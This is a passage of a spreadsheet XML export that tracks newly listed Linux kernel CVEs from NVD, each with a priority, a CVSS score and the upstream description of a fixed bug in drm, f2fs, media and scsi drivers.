      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89819</t>
        </is>
      </c>
      <c r="D483" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E483" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F483" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr"/>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: validate plane degamma LUT size for private color prop
Unlike the CRTC degamma path, which is guarded by
amdgpu_dm_verify_lut_sizes(), the per-plane degamma LUT size was never
validated before use. __set_dm_plane_degamma() passed the user-supplied
size straight into __is_lut_linear() and, for a non-linear LUT, into
__set_input_tf() -&gt; __drm_lut_to_dc_gamma(), the latter always iterating
MAX_COLOR_LUT_ENTRIES entries regardless of the actual LUT size.
A malformed AMD_PLANE_DEGAMMA_LUT blob (e.g. a single entry) could thus
trigger a divide-by-zero in __is_lut_linear() or an out-of-bounds read in
__drm_lut_to_dc_gamma(). Reject any plane degamma LUT whose size does not
match MAX_COLOR_LUT_ENTRIES, mirroring the invariant the code already
asserts a few lines below (and which the CRTC path enforces).
The AMD_PLANE_DEGAMMA_LUT property is only exposed on builds with
AMD_PRIVATE_COLOR defined.</t>
        </is>
      </c>
      <c r="S483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89819</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89823</t>
        </is>
      </c>
      <c r="D484" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E484" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F484" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr"/>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr"/>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm: fix race between partial drm_dev_register() failure and ioctl
If drm_dev_register() fails after registering a minor (e.g. render minor
registered, primary minor fails), userspace could have opened the first
minor and entered a drm_dev_enter() critical section. Since the
unplugged flag was never set, the ioctl proceeds while the error path
tears down device resources.
Fix this by introducing drm_dev_synchronize_unplug(), which sets the
unplugged flag and waits for the SRCU barrier, ensuring all in-flight
drm_dev_enter() critical sections complete before cleanup proceeds; call
it on the error path of drm_dev_register().</t>
        </is>
      </c>
      <c r="S484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89823</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89825</t>
        </is>
      </c>
      <c r="D485" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E485" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F485" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="inlineStr"/>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr"/>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panthor: fix firmware control interface bounds checks
panthor_init_cs_iface() and panthor_init_csg_iface() validate firmware
control interface offsets with 32-bit arithmetic and the size of the host
wrapper structures. The offsets are derived from firmware-provided strides,
so the arithmetic can wrap before the bounds check, and the host wrapper
size is not the size of the firmware control interface being mapped.
Use 64-bit arithmetic for the computed offsets and validate against the
actual firmware control interface structure sizes with subtraction-based
bounds checks. Also validate that the shared section is large enough for
the global control interface before using it.</t>
        </is>
      </c>
      <c r="S485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89825</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89829</t>
        </is>
      </c>
      <c r="D486" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E486" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F486" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="inlineStr"/>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr"/>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to pass folio-&gt;index to f2fs_sanity_check_node_footer()
Otherwise in f2fs_sanity_check_node_footer(), it will check the
same nid incorrectly.</t>
        </is>
      </c>
      <c r="S486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89829</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89832</t>
        </is>
      </c>
      <c r="D487" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E487" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F487" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="inlineStr"/>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr"/>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to clear dirty flag on folio in error path
If node block is corrupted due to chksum mismatch or inconsistent
footer info, it needs to drop clear flag of node folio, in order
to persist inconsistent node data to storage.</t>
        </is>
      </c>
      <c r="S487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89832</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89836</t>
        </is>
      </c>
      <c r="D488" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E488" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F488" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr"/>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix folio_nr_pages() race after put in large folio invalidate
Our v6.18 based Android system is continuely suffering livelock and bad
page stat as shown in[1] which related to broken xarray slot status. By
investigating big folio operations within f2fs, we find below races and
fix it by get the nr_pages before drop the refcount and folio_lock.
f2fs_get_read_data_folio() calls f2fs_folio_put() before
folio_nr_pages() when invalidating a large folio from the page cache.
That unlocks the folio and drops the caller reference, leaving a window
where a concurrent truncate or folio split can shrink the compound folio
or free it before the invalidate range is computed. An undersized range
then leaves split sub-folios in mapping-&gt;i_pages, which can later
interact badly with truncate and reclaim (stale xarray entries and bad
page state when folio-&gt;mapping no longer matches the mapping being
truncated).
[1]
PID: 2594     TASK: ffffff8169b81580  CPU: 7    COMMAND: "Thread-3"
 #0 [ffffffc08ef2b8a0] xas_load at ffffffe52d1f42a4
 #1 [ffffffc08ef2b900] find_get_entries at ffffffe52c185798
 #2 [ffffffc08ef2bb60] truncate_inode_pages_range at ffffffe52c19e83c
 #3 [ffffffc08ef2bbc0] truncate_inode_pages_final at ffffffe52c19ec2c
 #4 [ffffffc08ef2bc20] f2fs_evict_inode at ffffffe52c4c8400
 #5 [ffffffc08ef2bcc0] evict at ffffffe52c2de9f4
 #6 [ffffffc08ef2bd00] iput at ffffffe52c2db1b4
 #7 [ffffffc08ef2bd30] dentry_unlink_inode at ffffffe52c2d7204
 #8 [ffffffc08ef2bd50] __dentry_kill at ffffffe52c2d3dcc
 #9 [ffffffc08ef2bd80] dput at ffffffe52c2d3c3c
 #10 [ffffffc08ef2bda0] __fput at ffffffe52c2b0a7c
 #11 [ffffffc08ef2bde0] ____fput at ffffffe52c2b1034
 #12 [ffffffc08ef2bdf0] task_work_run at ffffffe52beea200
 #13 [ffffffc08ef2be20] exit_to_user_mode_loop at ffffffe52bfbc17c
 #14 [ffffffc08ef2be80] el0_svc at ffffffe52d1f8e54
 #15 [ffffffc08ef2beb0] el0t_64_sync_handler at ffffffe52d1f8d10</t>
        </is>
      </c>
      <c r="S488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89836</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89841</t>
        </is>
      </c>
      <c r="D489" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E489" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F489" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr"/>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: only redirty pinned folios in redirty_blocks
redirty_blocks() pins folios with read_cache_folio() and then walks the
same range again with filemap_lock_folio() to redirty them and drop the
references it took.
Commit 5951fee46bef ("f2fs: Use a folio in redirty_blocks()") changed
the second pass to a do/while loop. If read_cache_folio() fails before
anything is pinned, page_idx does not advance but the cleanup loop still
runs once.
If readahead has already populated the failed folio in page cache, that
extra iteration finds it and folio_put_refs(folio, 2) drops one
reference too many. Later drop_caches or reclaim can then report
"BUG: Bad page state".
Only redirty the range that was pinned successfully.</t>
        </is>
      </c>
      <c r="S489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89841</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89854</t>
        </is>
      </c>
      <c r="D490" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E490" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F490" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr"/>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix cs84xx use-after-free on host teardown
qla84xx_put_chip() drops the last reference to ha-&gt;cs84xx and frees it via
__qla84xx_chip_release() without clearing ha-&gt;cs84xx. During teardown it ran
before scsi_remove_host(), which is what removes the 84xx_fw_version host
sysfs attribute. A concurrent read of that attribute in the window between
the two calls executes qla24xx_84xx_fw_version_show(), which dereferences
the freed ha-&gt;cs84xx, resulting in a use-after-free.
Move qla84xx_put_chip() to after scsi_remove_host() in both
qla2x00_remove_one() and qla2x00_disable_board_on_pci_error(). Once
scsi_remove_host() returns, the sysfs attribute is gone and kernfs has
drained any in-flight show(), so no reader can touch cs84xx; the put still
runs before the host and ha are freed.</t>
        </is>
      </c>
      <c r="S490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89854</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89870</t>
        </is>
      </c>
      <c r="D491" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E491" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F491" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr"/>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: zoran: Avoid freeing a registered video_device twice
zoran_init_video_device() installs zoran_vdev_release() as the
video_device release callback through zoran_template. After
video_register_device() succeeds, video_unregister_device() drops the
registered video_device reference and the V4L2 core eventually invokes
that release callback, which kfree()s the video_device.
zoran_exit_video_devices() called video_unregister_device() and then
kfree(zr-&gt;video_dev), so device teardown could free the same
video_device twice.
Remove the direct kfree() and clear the cached pointer after
unregistering. The pre-registration failure path keeps its manual free
because the video_device was not registered there.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="S491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89870</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89873</t>
        </is>
      </c>
      <c r="D492" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E492" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F492" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="inlineStr"/>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr"/>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-ctrls: validate HEVC EXT SPS RPS counts
The HEVC SPS control carries the short-term and long-term RPS counts
that decoder drivers use to walk the matching EXT SPS dynamic arrays.
Reject SPS values that exceed the HEVC limits of 64 short-term sets and
32 long-term references so drivers cannot later index beyond those
controls.
Also reject EXT SPS ST RPS entries whose negative or positive picture
counts exceed the 16-entry arrays, or whose combined delta-POC count
exceeds the HEVC DPB maximum.</t>
        </is>
      </c>
      <c r="S492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89873</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89875</t>
        </is>
      </c>
      <c r="D493" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E493" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F493" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr"/>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: ti: vpe: quiesce overflow recovery before freeing streams
The VIP overflow recovery worker is armed from the hardirq handler when a
FIFO overflow is detected, and the list-complete path looks the stream up
through the VPDMA list private pointer. Both keep touching stream, port
and device state; the recovery worker also resets the parser and VPDMA,
repopulates the descriptor list, and re-enables the per-list IRQs.
vip_stop_streaming() masks and clears the per-list IRQs, but it neither
synchronizes the hardirq handler nor disables recovery_work. An overflow
IRQ that has already queued recovery_work, or a list-complete IRQ in
flight when the stream is torn down, can therefore still dereference the
stream after its resources are released: the descriptor list is freed by
vip_release_stream() on file release, and the stream itself by
free_stream() on unbind/remove.
Drain the recovery worker and the IRQ handler at both teardown points
through a shared vip_quiesce_stream() helper, before any stream-owned
resource is released. disable_work_sync() cancels pending recovery_work,
drains a running instance, and raises its disable depth, so a subsequent
schedule_work() issued by a racing IRQ handler is rejected at the
workqueue scheduler: recovery_work cannot be requeued after
disable_work_sync() takes effect. The worker may still re-enable the
per-list IRQs before disable_work_sync() returns; disable_irqs() then
masks those sources and synchronize_irq() waits for any in-flight handler
that still dereferences stream state. In vip_stop_streaming() the helper
runs before the parser is stopped, since a worker drained by
disable_work_sync() may re-enable the parser before exiting and would
otherwise undo the stop. recovery_work is created disabled and enabled in
vip_start_streaming() before IRQs, pairing the enable with the teardown
disable across the streaming lifecycle.
This issue was found by an in-house static analysis tool and confirmed
by manual code review.</t>
        </is>
      </c>
      <c r="S493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89875</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89880</t>
        </is>
      </c>
      <c r="D494" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E494" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F494" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr"/>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rtl2832_sdr: release URBs and stream buffers on start_streaming() failure
rtl2832_sdr_start_streaming() calls rtl2832_sdr_alloc_stream_bufs(),
rtl2832_sdr_alloc_urbs() and rtl2832_sdr_submit_urbs() in sequence and
shares a single err: label that only unlocks the mutex and returns.
When alloc_urbs() succeeds but submit_urbs() fails, or when alloc_urbs()
itself returns -ENOMEM after alloc_stream_bufs() has already succeeded,
the URBs and/or the coherent DMA stream buffers stay allocated while
streaming reports failure to vb2. Two latent defects follow on the next
VIDIOC_STREAMON:
1) rtl2832_sdr_alloc_stream_bufs() unconditionally resets dev-&gt;buf_num
   to 0 and overwrites dev-&gt;buf_list[]/dev-&gt;dma_addr[], permanently
   leaking the coherent DMA memory allocated by the previous attempt.
2) rtl2832_sdr_alloc_urbs() never resets dev-&gt;urbs_initialized and only
   increments it. After a second successful pass urbs_initialized can
   exceed MAX_BULK_BUFS, so the subsequent rtl2832_sdr_free_urbs() walks
   from urbs_initialized - 1 down to 0 and reads past the end of
   dev-&gt;urb_list[], passing garbage pointers to usb_free_urb().
Mirror the teardown that stop_streaming() already performs: on the error
path call rtl2832_sdr_free_urbs() and rtl2832_sdr_free_stream_bufs()
before unlocking. Both helpers are idempotent (free_urbs kills and zeros
urbs_initialized; free_stream_bufs is gated on URB_BUF and clears the
buf_num counter), so partial-failure paths and the no-allocation paths
remain safe.
Issue identified by automated review of the INV-003 series at
https://sashiko.dev/</t>
        </is>
      </c>
      <c r="S494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89880</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89882</t>
        </is>
      </c>
      <c r="D495" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E495" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F495" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr"/>
      <c r="L495" s="5" t="inlineStr"/>
      <c r="M495" s="5" t="inlineStr"/>
      <c r="N495" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O495" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P495" s="5" t="inlineStr"/>
      <c r="Q495" s="5" t="inlineStr"/>
      <c r="R495" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: rkvdec: hevc: guard INTER_REF_PIC_SET_PRED index underflow
st_ref_pic_set_prediction() computes the reference RPS index as
st_rps_idx - (delta_idx_minus1 + 1) per HEVC spec equation 7-59.
Both operands are u8, so when delta_idx_minus1 + 1 exceeds the
current index the subtraction wraps and the subsequent array access
at calculated_rps_st_sets[ref_rps_idx] reads far out of bounds.
A userspace V4L2 client that can open the RKVDEC m2m decoder can
submit an EXT_SPS_ST_RPS control with INTER_REF_PIC_SET_PRED set
and delta_idx_minus1 crafted to trigger the underflow.
Reject the entry early when the reference index would underflow.</t>
        </is>
      </c>
      <c r="S495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89882</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89883</t>
        </is>
      </c>
      <c r="D496" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E496" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F496" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr"/>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr"/>
      <c r="L496" s="5" t="inlineStr"/>
      <c r="M496" s="5" t="inlineStr"/>
